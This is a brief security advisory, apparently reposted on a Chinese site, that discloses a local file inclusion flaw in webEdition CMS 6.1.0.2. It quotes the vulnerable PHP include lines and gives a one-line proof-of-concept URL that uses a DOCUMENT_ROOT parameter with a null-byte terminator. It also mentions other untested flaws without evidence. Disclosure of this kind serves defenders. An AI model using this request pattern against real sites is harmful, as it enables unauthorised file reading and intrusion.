===================================================================
webEdition CMS (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================Software: webEdition CMS (6.1.0.2)
Vendor: http://www.webedition.org
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/webedition/files/webEdition/6.1.0.2/webEdition_6102.tar.gz/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
References: http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html===================================================================
description:
webEdition Version 6.1.0.2
webEdition is a web content management system licensed under the GPL For system requirements, installation and upgrade details, see the files INSTALL and the informations available on our website http://www.webedition.org
see webEdition/license folder for license informations
see INSTALL for quick installation instructions.
|
Vulnerability code: index.php /***************************************************************************** include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/conf/we_conf.inc.php"); /***************************************************************************** include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we.inc.php"); $ignore_browser = isset($_REQUEST["ignore_browser"]) && ($_REQUEST["ignore_browser"] === "true"); /***************************************************************************** |
|
exploit & p0c: [!] http://host/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 Nb: seems Another vulnerability also available like LFD , XSS , RFI maybe and etc , but i didnt check and test yet. |
文章来源于lcx.cc:WebEdition CMS (DOCUMENT_ROOT) 本地文件包含缺陷
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论